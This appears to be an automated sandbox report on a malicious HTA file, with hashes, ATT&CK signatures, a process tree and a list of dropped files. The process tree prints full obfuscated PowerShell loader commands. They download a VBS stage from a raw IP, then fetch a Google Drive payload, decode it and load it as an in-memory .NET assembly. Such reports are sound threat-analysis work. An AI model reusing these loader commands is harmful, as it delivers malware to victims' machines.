Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-10-2024 02:20
Static task
static1
Behavioral task
behavioral1
Sample
30e23614597083e75d18692843858ef0a7fb7bd63d028e728616d4dd45169c3f.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
30e23614597083e75d18692843858ef0a7fb7bd63d028e728616d4dd45169c3f.hta
Resource
win10v2004-20241007-en
General
-
Target
30e23614597083e75d18692843858ef0a7fb7bd63d028e728616d4dd45169c3f.hta
-
Size
130KB
-
MD5
b85260924fba0846c8b7c5a097a95609
-
SHA1
911e67583068cf720cc7b6548c2ac11a7bbfb1a2
-
SHA256
30e23614597083e75d18692843858ef0a7fb7bd63d028e728616d4dd45169c3f
-
SHA512
a60163b64564fd14c39213e895c89f1126f4ac1a4fc4c1fa442012e16eedb8778047e95b91a8090e74d6683269757626472d2a1a652faf2d4923887f5504ef04
-
SSDEEP
96:Eam7XEWHA0WWHA5xdFxVfLPOYdb2YyCWHAMPWHA3Uz5+2TWHAbc7T:Ea2Xk0GHDxVfzyKCLwbiT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2332 pOwerSHELl.EXe 6 2804 powershell.exe 8 2804 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2940 powershell.exe 2804 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2332 pOwerSHELl.EXe 2140 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwerSHELl.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2332 pOwerSHELl.EXe 2140 powershell.exe 2332 pOwerSHELl.EXe 2332 pOwerSHELl.EXe 2940 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2332 pOwerSHELl.EXe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2096 wrote to memory of 2332 2096 mshta.exe 31 PID 2096 wrote to memory of 2332 2096 mshta.exe 31 PID 2096 wrote to memory of 2332 2096 mshta.exe 31 PID 2096 wrote to memory of 2332 2096 mshta.exe 31 PID 2332 wrote to memory of 2140 2332 pOwerSHELl.EXe 33 PID 2332 wrote to memory of 2140 2332 pOwerSHELl.EXe 33 PID 2332 wrote to memory of 2140 2332 pOwerSHELl.EXe 33 PID 2332 wrote to memory of 2140 2332 pOwerSHELl.EXe 33 PID 2332 wrote to memory of 2824 2332 pOwerSHELl.EXe 34 PID 2332 wrote to memory of 2824 2332 pOwerSHELl.EXe 34 PID 2332 wrote to memory of 2824 2332 pOwerSHELl.EXe 34 PID 2332 wrote to memory of 2824 2332 pOwerSHELl.EXe 34 PID 2824 wrote to memory of 2968 2824 csc.exe 35 PID 2824 wrote to memory of 2968 2824 csc.exe 35 PID 2824 wrote to memory of 2968 2824 csc.exe 35 PID 2824 wrote to memory of 2968 2824 csc.exe 35 PID 2332 wrote to memory of 1028 2332 pOwerSHELl.EXe 37 PID 2332 wrote to memory of 1028 2332 pOwerSHELl.EXe 37 PID 2332 wrote to memory of 1028 2332 pOwerSHELl.EXe 37 PID 2332 wrote to memory of 1028 2332 pOwerSHELl.EXe 37 PID 1028 wrote to memory of 2940 1028 WScript.exe 38 PID 1028 wrote to memory of 2940 1028 WScript.exe 38 PID 1028 wrote to memory of 2940 1028 WScript.exe 38 PID 1028 wrote to memory of 2940 1028 WScript.exe 38 PID 2940 wrote to memory of 2804 2940 powershell.exe 40 PID 2940 wrote to memory of 2804 2940 powershell.exe 40 PID 2940 wrote to memory of 2804 2940 powershell.exe 40 PID 2940 wrote to memory of 2804 2940 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\30e23614597083e75d18692843858ef0a7fb7bd63d028e728616d4dd45169c3f.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\SysWOW64\WindOwspowERshell\V1.0\pOwerSHELl.EXe"C:\Windows\syStEM32\WindOwspowERshell\V1.0\pOwerSHELl.EXe" "poWErSheLl -EX bypaSS -NOP -w 1 -c DEVIcEcReDenTiaLdEploymeNT ; iEx($(Iex('[sySteM.teXT.EnCoDiNG]'+[cHAR]58+[chAR]58+'UTF8.gEtStRing([System.CONVErT]'+[char]58+[cHaR]58+'FRombaSE64sTrIng('+[cHAR]34+'JHRmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFZmlOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJOVVosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBZWFhwTEhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGbmosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRldEZiZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZUoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUNQRERXa1Zpd2EgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkdGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzM4MC9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0aGFwcGluZXNzd2l0aG1lLnRJRiIsIiRlblY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0aGFwcGluZXNzd2l0LnZiUyIsMCwwKTtzdEFSdC1TTGVFcCgzKTtTVEFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRoYXBwaW5lc3N3aXQudmJTIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bypaSS -NOP -w 1 -c DEVIcEcReDenTiaLdEploymeNT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwy6u2ni.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB04.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDB03.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreathappinesswit.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aUVYKCAoKCdSdUNpbWFnZVVybCA9IHFhZGh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHFhJysnZDtSdUN3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1J1Q2ltYScrJ2dlQnl0ZXMgPSBSdUN3ZWJDbGllbnQuRG93bmxvYWREYXRhKFJ1Q2ltYWdlVXJsKTtSdUNpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZyhSdUNpbWFnZUJ5dGVzKTtSdUNzdGFydEZsYWcgPSBxYWQ8PEJBU0U2NF9TVEEnKydSVD4+cWFkO1J1Q2VuZEZsYWcgPSBxYWQ8PEJBU0U2NF9FTkQ+PicrJ3FhZDtSdUNzdGFydEluZGV4ID0gUnVDaW1hZ2VUZXh0LkluZGV4T2YoUnVDc3RhcicrJ3RGbGFnKTtSdUNlbmRJbmRlJysneCA9IFJ1Q2ltYWdlVGV4dC5JbmRleE9mKFJ1Q2VuZEZsYWcpO1J1Q3N0YXJ0SW5kZXggLWdlIDAgJysnLWFuZCBSdUNlbmRJbmRleCAtZ3QgUnVDc3RhcnRJbmRleDtSdUNzdGFydEluZGV4ICs9IFJ1Q3N0YXJ0RmxhZy5MZW5ndGg7UnVDYmFzZTY0TGVuZ3RoID0gUnVDZW5kSW5kZXggLSBSdUNzdGFydEluZGV4O1J1Q2Jhc2U2NENvbW1hbmQgPSBSdUNpbWFnZVRleHQuU3Vic3RyaW5nKFJ1Q3N0YXJ0SW5kZXgsIFJ1Q2Jhc2U2NExlbmd0aCk7UnVDYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoUnVDYmFzZTY0Q29tJysnbWFuZC5Ub0NoYXJBcnJheSgpIExtbCBGb3JFYWNoLU9iamVjdCB7IFJ1Q18gfSlbLTEuLi0oUnVDYmFzZTY0QycrJ29tbWFuZC5MZW5ndGgpXTtSJysndUNjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOicrJzpGcm9tQmFzZTY0U3RyaScrJ25nKFJ1JysnQ2Jhc2U2NFJldmVyc2VkKTtSdUNsbycrJ2EnKydkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoUnVDY29tbWFuZEJ5dGVzKTtSdUN2YScrJ2lNZXRob2QgPSBbZG5saWIuSU8uSG9tJysnZV0nKycuR2V0TWV0aG9kKHFhZFZBSXFhZCk7UnVDdmFpTWV0aG9kLkludm9rZShSdUNudWxsLCBAKHFhZHR4dC5DVkZEUlJXLzA4My8yOC42MDIuNTEyLjU4Ly86cHR0aHFhZCwgcWFkZGVzYXRpdmFkb3FhZCwgcWFkZGVzYXRpdmFkb3FhZCwgcWFkZGVzYXRpdmFkb3FhZCwgcWFkQ2FzUG9scWFkLCBxYWRkZXNhdGl2YWRvcWFkLCBxYWRkZXNhdGl2JysnYWRvcWFkLHFhZGRlc2F0aXZhZG9xYScrJ2QscWFkZGVzYXRpdmFkb3FhZCxxYWRkZXNhdGl2YWRvcWFkLHFhZGRlc2F0aXZhZG9xYWQscWFkZGVzYXQnKydpdmFkb3FhZCxxYWQxcWFkLHFhZGRlc2F0aXZhZG9xYWQpKTsnKSAgLVJlUGxhQ2UgJ0xtbCcsW2NoYXJdMTI0ICAtQ1JFUExhY0UoW2NoYXJdMTEzK1tjaGFyXTk3K1tjaGFyXTEwMCksW2NoYXJdMzktQ1JFUExhY0UoW2NoYXJdODIrW2NoYXJdMTE3K1tjaGFyXTY3KSxbY2hhcl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iEX( (('RuCimageUrl = qadhttps:/'+'/drive.google.c'+'om/uc?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur qa'+'d;RuCwebClient = New-Object System.Net.WebClient;RuCima'+'geBytes = RuCwebClient.DownloadData(RuCimageUrl);RuCimageText = [System.Text.Encoding'+']::UTF8.GetString(RuCimageBytes);RuCstartFlag = qad<<BASE64_STA'+'RT>>qad;RuCendFlag = qad<<BASE64_END>>'+'qad;RuCstartIndex = RuCimageText.IndexOf(RuCstar'+'tFlag);RuCendInde'+'x = RuCimageText.IndexOf(RuCendFlag);RuCstartIndex -ge 0 '+'-and RuCendIndex -gt RuCstartIndex;RuCstartIndex += RuCstartFlag.Length;RuCbase64Length = RuCendIndex - RuCstartIndex;RuCbase64Command = RuCimageText.Substring(RuCstartIndex, RuCbase64Length);RuCbase64Reversed = -join (RuCbase64Com'+'mand.ToCharArray() Lml ForEach-Object { RuC_ })[-1..-(RuCbase64C'+'ommand.Length)];R'+'uCcommandBytes = [System.Convert]:'+':FromBase64Stri'+'ng(Ru'+'Cbase64Reversed);RuClo'+'a'+'dedAssembly = [System.Reflection.Assembly]::Load(RuCcommandBytes);RuCva'+'iMethod = [dnlib.IO.Hom'+'e]'+'.GetMethod(qadVAIqad);RuCvaiMethod.Invoke(RuCnull, @(qadtxt.CVFDRRW/083/28.602.512.58//:ptthqad, qaddesativadoqad, qaddesativadoqad, qaddesativadoqad, qadCasPolqad, qaddesativadoqad, qaddesativ'+'adoqad,qaddesativadoqa'+'d,qaddesativadoqad,qaddesativadoqad,qaddesativadoqad,qaddesat'+'ivadoqad,qad1qad,qaddesativadoqad));') -RePlaCe 'Lml',[char]124 -CREPLacE([char]113+[char]97+[char]100),[char]39-CREPLacE([char]82+[char]117+[char]67),[char]36))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b1cb4d0c3a76133445da919d13492d19
SHA11ad400bc0b19e85d813d9f17aafcc605f91e7e71
SHA25644de0ef9653981ff275d65c89ec6cf095ef6282bc4d0e6ab08317c1a1d2181fd
SHA512317eb303da54d9d404e677f883fa188c8fc15ae16ba836272c4418a7fd81e7bba15b1ae9c3e4e407b8efa43290cf6d31396ad95d49bde92a3594a73a85f4d85f
-
Filesize
3KB
MD5a925a66fd49d25b74520aab8c531cb3f
SHA17e5a30d546fbdb3b0494dacab55ed55dbcb9111b
SHA2563cc6322c6c783215020663526a69239c2e4f01c0d369a14062a8bca8a10d9392
SHA5124591865bf124db109714a5c5b36be4ecdd24b23ffaeb7e63bdd348cb125bc822cfed0081e09d03c491c50afb704a32a1c1433ea643258f92d211b9f46bb28b6e
-
Filesize
7KB
MD57be9dbf250317d542eaf4614b8170e98
SHA12001267d2ea56dba66e1fdc47fa405de060e8f40
SHA256c3646768d475baeae097eb33f48056e01ccb47154e2cfb4f6e105cb6425cf381
SHA512c60a7f035e265b226e76c3c78385617b619d738e8b5efa3817041751ed4f10c8519fb429ee58ac9993f8bfd27ad0320406e1d0633ac0665ccee4753269cb5cb1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD525944b03b5e9f5051f6338f465f2c497
SHA1f322d7f39e36ceec5fbe52dc554c613b35f04439
SHA2564fd17e67dc9aa37752988773f73c4f20831a4736d8f0337557c01fabf4738e2b
SHA5122e54c81a7b3eacffcb674f3042e5d327c10c92009dc67e9a772a78a3a31bc3fc2dbd1218c7da5c393f5c1c0b2645eb997c66469e721a87e7dbb5f9048f282ecc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5efd71ca4bbfd3ad4014c0c7b976596d5
SHA16f5a764b0078ba0ee68c10e895b2df4bb723c3a6
SHA256a51b78b148ac67809e6b8f04a131e50aefb3a23d9745857d5cb0636a9bd7a837
SHA512a949975fd1a22da0a870de2738a52aa1271a02fdf1d09f0cb056cd4f2359f9d43b64366283958eebe16b64c75a9d2908b98c873749c38a2142dae0f9d52ac23b
-
Filesize
137KB
MD5943769c1661d4e66fb570fc18be9a171
SHA10204c63f393b0a5fb3467816a08f6006c54b19c1
SHA256cb21f3d02a6dd6dd9e79081ff50a9c36cb6f9266b3f2e47417a919694e0b1545
SHA5124fe2047f5808fdaf8df6d196b0dea50a2d0431e8ce6421ae399d06046e7d394df68056b1ffff0d5c940d8f00320b154ef3ffddd3be91c3671b031ff71bc86c2f
-
Filesize
652B
MD5b75100027f88942c9fc0025fd82b946c
SHA187a8e7812572149ebd443063cd8b181f8ae563a5
SHA25609a692031fa65b5e3d4af58d61e23fd13e78bfb62656cd88ec67835dec14350f
SHA5125ac88cb170c211d3cc8a2e76f3b31e3a78b05369d4b80220e96750d35031e672c3b15dfb634b279b021d7a144e4f3a76108d49632f28c6571cd8387cbdfb1c29
-
Filesize
462B
MD5b31b2127406ec8062b42f6cfaeeba531
SHA11d117bf0fb1fc24f57f341d6acd95154a47298b2
SHA2568545b19637a099a1147203c681c7b8b049da6021259c3fba765d1412f0fc3dba
SHA5121238e4d22fb2411c8bfe27164e93ca5038a704365dbdea70983867ff8a54c46597e9e7e2262f3d7b349132d0cf1991790e30d4948903454eb803a6820435bfed
-
Filesize
309B
MD57035dc8abb3804336807fef4fd853dd7
SHA1a8131be0172c272cd0e22925392bdd45e621ba4e
SHA256996dd8bea17f763761b79fb1c5760043f8259e317dd3281da037c5899b4f846d
SHA5124577d32f357db24dcec48900363999ad2065f69bdc9b1c3076076c1c8b72651c3d93bd2d422792a2ef6465f37d66a307a720bef9deab5f0ee52b919bc461ad1c